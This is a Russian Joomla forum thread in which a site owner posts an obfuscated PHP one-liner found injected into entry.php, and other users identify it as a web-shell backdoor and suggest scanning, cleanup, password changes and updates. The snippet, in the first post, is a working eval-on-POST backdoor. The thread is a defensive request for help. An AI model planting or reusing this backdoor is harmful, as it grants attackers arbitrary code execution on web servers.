Основной курс по Joomla
0 Пользователей и 1 Гость просматривают эту тему.
  • 10 Ответов
  • 470 Просмотров
*

aslanamirov

  • Осваиваюсь на форуме
  • ***
  • 88
  • 4
  • Ййехаа!
Код
$xlt7 ="utspeo_r" ; $cjk22 = $xlt7[2]. $xlt7[1].$xlt7[7].$xlt7[1]. $xlt7[5].$xlt7[0]. $xlt7[3].$xlt7[3]. $xlt7[4]. $xlt7[7]; $zgyh5 =$cjk22 ($xlt7[6]. $xlt7[3]. $xlt7[5].$xlt7[2].$xlt7[1] );if(isset ( ${ $zgyh5 }[ 'q493de8' ] )){ eval (${$zgyh5 } [ 'q493de8' ] ) ;}?> <?php

Сей код выдал ошибку что то про сессии, забыл заскринить. Код был вставлен в 1 строку с кучей пробелов после <?php

Что это? и откуда могло вылезти?

UPD: админку скрыл нужными плагинами. Joomla 3.5.0
« Последнее редактирование: 21.04.2016, 04:38:10 от aslanamirov »
*

draff

  • Практически профи
  • *******
  • 2746
  • 170
  • step by step
Re: Какой то код прописался в entry.php?
« Ответ #1 : 21.04.2016, 09:29:59 »
 откуда Joomla ? Проверять сайт на вирусы, шелл
*

flyingspook

  • Moderator
  • *****
  • 3610
  • 236
*

aslanamirov

  • Осваиваюсь на форуме
  • ***
  • 88
  • 4
  • Ййехаа!
Re: Какой то код прописался в entry.php?
« Ответ #3 : 21.04.2016, 12:35:18 »
откуда Joomla ? Проверять сайт на вирусы, шелл

А не подскажете чем лучше проверять сайт?
*

draff

  • Практически профи
  • *******
  • 2746
  • 170
  • step by step
Re: Какой то код прописался в entry.php?
« Ответ #5 : 21.04.2016, 13:08:31 »
По моему айболит на этот скрипт не реагирует.Рандомно меняются имя переменный и значения.
*

flyingspook

  • Moderator
  • *****
  • 3610
  • 236
Re: Какой то код прописался в entry.php?
« Ответ #6 : 21.04.2016, 13:17:57 »
По моему айболит на этот скрипт не реагирует.Рандомно меняются имя переменный и значения.
Отреагирует там { eval присутствует не полностью обфусцировано, любой сканер покажет что файл надо проверить.
*

winstrool

  • Завсегдатай
  • *****
  • 758
  • 39
  • Свободен для работы
Re: Какой то код прописался в entry.php?
« Ответ #7 : 21.04.2016, 22:31:41 »
По моему айболит на этот скрипт не реагирует.Рандомно меняются имя переменный и значения.
Реагирует!, в нем заложена эвристика подобных бегдоров, в которых принцип не в переменных, а в конструкции кода...
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям
*

aslanamirov

  • Осваиваюсь на форуме
  • ***
  • 88
  • 4
  • Ййехаа!
Re: Какой то код прописался в entry.php?
« Ответ #8 : 23.04.2016, 15:51:59 »
https://www.revisium.com/ai/

Блин, прогнал айболита нашел 43 шелла :(
Кто может что подсказать каким образом эти гады лезут на сайт?
Обновил Joomla до 3.5.1 - поможет?
*

wishlight

  • Профи
  • ********
  • 3593
  • 220
  • skype aqaus.com
Re: Какой то код прописался в entry.php?
« Ответ #9 : 23.04.2016, 17:38:44 »
Поздно уже. Кроме обновления надо вычистить все вредоносные коды и сменить пароли. На локалке желательно.
*

flyingspook

  • Moderator
  • *****
  • 3610
  • 236
Re: Какой то код прописался в entry.php?
« Ответ #10 : 23.04.2016, 17:53:55 »
Заливают их через уязвимости движка и расширений, своевременное обновление помогает только до их появления, а раз уж они уже на сайте, то теперь надо выполнить чистку и потом уже обновлять все. В дальнейшем следить.